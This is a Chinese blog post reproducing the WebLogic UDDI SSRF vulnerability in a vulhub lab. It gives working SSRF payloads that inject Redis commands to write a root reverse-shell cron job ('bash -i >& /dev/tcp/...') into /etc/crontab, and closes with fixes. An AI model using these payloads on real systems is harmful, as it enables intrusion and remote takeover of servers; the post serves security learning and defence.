大家好,又见面了,我是你们的朋友全栈君。
1.漏洞描述
weblogic中存在SSRF漏洞,利用该漏洞可以发送任意HTTP请求,进而攻击内网中redis、fastcgi等脆弱组件。
2.影响版本
weblogic 10.0.2 – 10.3.6版本
3.POC
http://192.168.42.145:7001/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://127.0.0.1:7001
http://192.168.42.145:7001//uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://172.25.0.2:6379/test%0D%0A%0D%0Aset%201%20%22\n\n\n\n*%20*%20*%20*%20*%20root%20bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.42.138%2F1919%200%3E%261\n\n\n\n%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave%0D%0A%0D%0Aqwezxc
4.漏洞环境
靶机:192.168.42.145
Redis容器:172.25.0.2
Kali:192.168.42.138
5.漏洞复现
切换到vulhub/weblogic/ssrf文件夹
docker-compose up –d下载weblogic漏洞环境
![Weblogic SSRF漏洞[通俗易懂]](http://qn.javajgs.com/20220625/a76198d0-d97a-464b-a145-322d32083dcc2022062581c322d0-ea51-472d-9403-fdfd279be22c1.jpg)
![Weblogic SSRF漏洞[通俗易懂]](https://javaforall.net/wp-content/uploads/2020/11/2020110817443450.jpg)
访问Weblogic http://192.168.42.145:7001/console/login/LoginForm.jsp
![Weblogic SSRF漏洞[通俗易懂]](http://qn.javajgs.com/20220625/9d887ed0-515a-4e27-a1b5-11e5c22fcf592022062575fe7333-d39e-4d74-a356-f79030bb5ebd1.jpg)
SSRF漏洞位于http://192.168.42.145:7001/uddiexplorer/SearchPublicRegistries.jsp,点击search按钮,用burp抓包
![Weblogic SSRF漏洞[通俗易懂]](http://qn.javajgs.com/20220625/612e28ea-6bc9-4d8f-b34a-815a192afc9f202206251ed78466-4bad-432b-b84e-9bf22eaf9e151.jpg)
![Weblogic SSRF漏洞[通俗易懂]](http://qn.javajgs.com/20220625/90e9cec9-9dc9-4d62-996e-a7ded6c0dc45202206251a7ef4e2-9402-412d-acbf-24fa694d76781.jpg)
如果指定端口开放则会返回带有404内容的提示
![Weblogic SSRF漏洞[通俗易懂]](http://qn.javajgs.com/20220625/101a9448-5e93-4d74-b4b5-ec64218604eb20220625a4320155-5be5-4471-9103-09012dd449911.jpg)
访问的端口不开放则会出现“not connect over”内容提示
![Weblogic SSRF漏洞[通俗易懂]](http://qn.javajgs.com/20220625/4e0787b9-7241-46df-8b7e-400b94e0c69720220625191fdbe0-0fe6-470f-b4fc-103fd64ee1641.jpg)
也可利用GET请求,payload:192.168.42.145:7001/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://127.0.0.1:7001,用burp抓包
![Weblogic SSRF漏洞[通俗易懂]](http://qn.javajgs.com/20220625/75d9e891-05de-4715-8112-987d9ece509a20220625852c6250-1aa8-449b-9ee7-568976cbe8e01.jpg)
docker exec -it 5b95be683f16 /bin/bash 进入容器,查看ip
![Weblogic SSRF漏洞[通俗易懂]](http://qn.javajgs.com/20220625/6787bdec-156e-4182-b682-11afb2a23d442022062507c30f15-3fca-4fbd-98fd-9fe1527792c61.jpg)
探测redis容器
![Weblogic SSRF漏洞[通俗易懂]](http://qn.javajgs.com/20220625/3c896e8b-a712-4f8f-9749-fcd86ce9ffe9202206259e1b15dd-0e8f-4780-a116-de46a2333a751.jpg)
6.注入HTTP头,利用Redis+SSRF漏洞反弹shell
发送三条redis命令,将反弹shell脚本写入/etc/crontab
test
set 1 "\n\n\n\n* * * * * root bash -i >& /dev/tcp/192.168.42.138/1919 0>&1\n\n\n\n"
config set dir /etc/
config set dbfilename crontab save
aaa
将这三条命令进行URL编码
%74%65%73%74%20%20%0a%20%0a%73%65%74%20%31%20%22%5c%6e%5c%6e%5c%6e%5c%6e%2a%20%2a%20%2a%20%2a%20%2a%20%72%6f%6f%74%20%62%61%73%68%20%2d%69%20%3e%26%20%2f%64%65%76%2f%74%63%70%2f%31%39%32%2e%31%36%38%2e%34%32%2e%31%33%38%2f%31%39%31%39%20%30%3e%26%31%5c%6e%5c%6e%5c%6e%5c%6e%22%0a%63%6f%6e%66%69%67%20%73%65%74%20%64%69%72%20%2f%65%74%63%2f%20%0a%63%6f%6e%66%69%67%20%73%65%74%20%64%62%66%69%6c%65%6e%61%6d%65%20%63%72%6f%6e%74%61%62%20%73%61%76%65%20%20%0a%20%0a%61%61%61![Weblogic SSRF漏洞[通俗易懂]](http://qn.javajgs.com/20220625/caa4c6c0-af5e-4266-9122-e1706df4065620220625b0197d40-0c12-4a6f-a2b6-1c2dbe14066b1.jpg)
复制到operator参数后执行,看响应成功执行这三条命令
![Weblogic SSRF漏洞[通俗易懂]](http://qn.javajgs.com/20220625/d5fa6b58-7c3b-4bdc-bcac-d62f4e4cbe08202206252f8001e8-c32d-40b9-b3b6-1f35348374771.jpg)
也可直接执行如下payload:
http://192.168.42.145:7001//uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://172.25.0.2:6379/test%0D%0A%0D%0Aset%201%20%22\n\n\n\n*%20*%20*%20*%20*%20root%20bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.42.138%2F1919%200%3E%261\n\n\n\n%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave%0D%0A%0D%0Aqwezxc![Weblogic SSRF漏洞[通俗易懂]](http://qn.javajgs.com/20220625/ca1a739e-21d5-476d-8178-527c6a5928ca20220625322b1419-1c62-42f2-bcd8-4a17b67cfc461.jpg)
等待一会,成功反弹shell
![Weblogic SSRF漏洞[通俗易懂]](http://qn.javajgs.com/20220625/8955677e-f7ff-482b-b2b4-95ac73913fcc2022062577cb5f24-3e94-45b8-bbfd-7f4ccd42ba461.jpg)
查看redis容器的/etc/crontab,命令被成功写到crontab中
![Weblogic SSRF漏洞[通俗易懂]](http://qn.javajgs.com/20220625/9a7f163e-1193-45e0-8293-65f0d350b26f20220625c3e033bd-d5e9-4ee0-a47c-338ae43cc6e61.jpg)
7.修复方案
方法一:
删除uddiexplorer文件夹
限制uddiexplorer应用只能内网访问
方法二:
将SearchPublicRegistries.jsp直接删除
方法三:
Weblogic服务端请求伪造漏洞出现在uddi组件(所以安装Weblogic时如果没有选择uddi组件那么就不会有该漏洞),更准确地说是uudi包实现包uddiexplorer.war下的SearchPublicRegistries.jsp。方法三采用的是改后辍的方式,修复步骤如下:
1)将weblogic安装目录下的wlserver_10.3/server/lib/uddiexplorer.war做好备份;
2)将weblogic安装目录下的server/lib/uddiexplorer.war下载;
3)用winrar等工具打开uddiexplorer.war;
4)将其下的SearchPublicRegistries.jsp重命名为SearchPublicRegistries.jspx;
5)保存后上传回服务端替换原先的uddiexplorer.war;
6)对于多台主机组成的集群,针对每台主机都要做这样的操作;
7)由于每个server的tmp目录下都有缓存所以修改后要彻底重启weblogic。
发布者:全栈程序员-站长,转载请注明出处:https://javaforall.net/152804.html原文链接:https://javaforall.net
